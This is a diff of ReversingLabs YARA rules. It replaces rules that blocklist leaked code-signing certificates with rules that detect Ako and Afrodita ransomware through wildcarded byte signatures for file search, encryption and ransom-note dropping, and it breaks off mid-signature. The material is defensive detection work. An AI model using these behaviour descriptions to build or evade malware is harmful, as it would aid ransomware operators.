REVERSINGLABS_Cert_Blocklist_5E15205F180442Cc6C3C0F03E1A33D9F : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Ako : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Ako ransomware." author = "ReversingLabs" - id = "4a0d995a-37df-52a4-a66f-4bc6c290c10a" - date = "2023-11-08" - modified = "2023-11-08" + id = "00d67696-998c-5bc3-95e7-0320ca558cdb" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2194-L2210" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "1ca238b5da4ff9940425c99f55542c931ccdf0ea3b0a2acbf00ffbbb54171ae0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Ako.yara#L1-L152" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "488e9b528f75fcfaa8dd19859801e6e5a73575c33cd70c98ebaa9ae93025018b" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Ako" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_network_shares_win32_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? 8B + 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 + ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 85 D2 0F + 85 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 + ?? ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 52 + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + } + $encrypt_network_shares_win32_p2 = { + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? + ?? ?? ?? 52 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 + 8B 4D ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 + ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? + E8 ?? ?? ?? ?? 0F B6 C8 85 C9 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 55 ?? + 83 C2 ?? 89 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 45 ?? 73 ?? 83 7D ?? ?? 76 ?? 8B 45 + } + $encrypt_network_shares_win32_p3 = { + 33 D2 B9 ?? ?? ?? ?? F7 F1 85 D2 75 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 4D ?? E8 + ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? EB ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? + 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 55 ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? + E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? + ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 8D + 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? + ?? 8A 45 ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? 32 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D + C2 + } + $find_files_win32_p1 = { + 8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B + 7D ?? 2B CA D1 F9 8B C7 41 F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ?? 03 + D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? + 85 C0 75 ?? 8B 7D ?? 8B CF E8 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 56 E8 ?? ?? ?? ?? 59 EB + ?? 8B 47 ?? 89 30 83 47 ?? ?? 33 DB 6A ?? E8 ?? ?? ?? ?? 59 8B C3 5E 5F 5B 8B E5 5D + C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? + ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 89 8D ?? ?? ?? ?? 56 57 3B D3 74 + ?? 0F B7 02 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 84 C0 75 ?? 83 EA ?? 3B D3 75 ?? 8B + } + $find_files_win32_p2 = { + 8D ?? ?? ?? ?? 0F B7 32 83 FE ?? 75 ?? 8D 43 ?? 3B D0 74 ?? 51 33 FF 57 57 53 E8 ?? + ?? ?? ?? 83 C4 ?? EB ?? 56 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 2B D3 0F B6 C0 D1 FA 42 + F7 D8 68 ?? ?? ?? ?? 1B C0 33 FF 23 C2 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B + 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 + ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B + 48 ?? 2B 08 C1 F9 ?? 6A ?? 89 8D ?? ?? ?? ?? 59 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD + ?? ?? ?? ?? 74 ?? 66 39 8D ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 50 FF B5 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? + ?? 50 56 FF 15 ?? ?? ?? ?? 6A ?? 85 C0 8B 85 ?? ?? ?? ?? 59 75 ?? 8B 10 8B 40 ?? 8B + 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 + 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $encrypt_files_win32_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? + 33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 83 7D ?? ?? 74 ?? 83 7D ?? ?? + 75 ?? 32 C0 E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 73 ?? 32 C0 E9 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 33 C9 89 4D ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 + C0 E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 8D ?? ?? ?? ?? + 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 33 D2 89 55 ?? C7 45 ?? ?? ?? ?? ?? 33 C0 89 45 ?? 0F 57 C0 66 0F 13 85 ?? + ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 D2 ?? 89 8D + ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 0F 8F ?? ?? ?? ?? 7C ?? 8B + 8D ?? ?? ?? ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? 6A ?? 8D 55 ?? 52 + } + $encrypt_files_win32_p2 = { + 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 + 68 ?? ?? ?? ?? 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85 C0 + 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? + ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 + 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 45 ?? 8B 4D ?? 3B 4D ?? + 0F 83 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 03 45 ?? 50 6A ?? 8D 4D ?? + E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 6A ?? 8B 4D ?? 51 8B 4D ?? E8 ?? ?? ?? ?? 0F B6 D0 + 85 D2 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8A 45 ?? E9 + ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 50 8B 55 + ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 + ?? ?? ?? ?? 8A 45 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? EB ?? E9 ?? ?? + ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 4D + ?? 8B 95 ?? ?? ?? ?? 89 55 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 89 85 + } + $encrypt_files_win32_p3 = { + 8B 8D ?? ?? ?? ?? 89 4D ?? 8B 95 ?? ?? ?? ?? 89 55 ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 + 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 + 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 50 8B 55 ?? 52 + FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 83 C1 ?? E8 ?? ?? ?? ?? 39 45 ?? 75 ?? 0F 57 + C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 4D + ?? 89 4D ?? 8B 55 ?? 89 55 ?? 6A ?? 8D 45 ?? 50 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 + ?? ?? ?? ?? 85 C0 74 ?? 83 7D ?? ?? 75 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D + ?? E8 ?? ?? ?? ?? 8A 45 ?? EB ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? + ?? ?? ?? 8A 45 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B + E5 5D C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ziber Ltd" and pe.signatures[i].serial=="5e:15:20:5f:18:04:42:cc:6c:3c:0f:03:e1:a3:3d:9f" and 1498607999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_win32_p*)) and ( all of ($encrypt_files_win32_p*)) and ( all of ($encrypt_network_shares_win32_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4C8E3B1613F73542F7106F272094Eb23 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Afrodita ransomware." author = "ReversingLabs" - id = "06f79efe-134e-5941-80fe-3b6482ac9668" - date = "2023-11-08" - modified = "2023-11-08" + id = "513963fd-5f3d-5d31-a65a-37f6f5c72260" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2212-L2228" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "15c21b783409d904a0b4971dbdcbd0740083d13f3c633ee77c87df46d3aca748" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Afrodita" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADD Audit" and pe.signatures[i].serial=="4c:8e:3b:16:13:f7:35:42:f7:10:6f:27:20:94:eb:23" and 1472687999<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2Ce2Bd0Ad3Cfde9Ea73Eec7Ca30400Da : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "b7439b38-c8b7-5dcb-8d10-952862ce3465" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2230-L2246" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a879ecd957acd29e8a5bad6c97cd10453ab857949680b522735bd77eb561d2ee" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $exclude_directories_and_drop_ransom_note = { + 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ?? + ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D + 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? + 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? + ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B + 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? + ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8 + ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? + ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A + ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D + 4D ?? E8 ?? ?? ?? ?? EB ?? B8 + } + $drop_ransom_note_no_dir_exclusion = { + 8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 + ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ?? + ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6 + 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? + 50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? + 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 + ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B + 5D ?? B8 ?? ?? ?? ?? C3 C7 45 + } + $find_files_p1 = { + 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53 + 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ?? + 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ?? + ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? + ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B + CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ?? + 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8 + } + $find_files_p2 = { + 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 + ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ?? + ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? + ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? + ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? + ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ?? + ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ?? + 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ?? + ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ?? + 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files = { + 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? + ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45 + ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 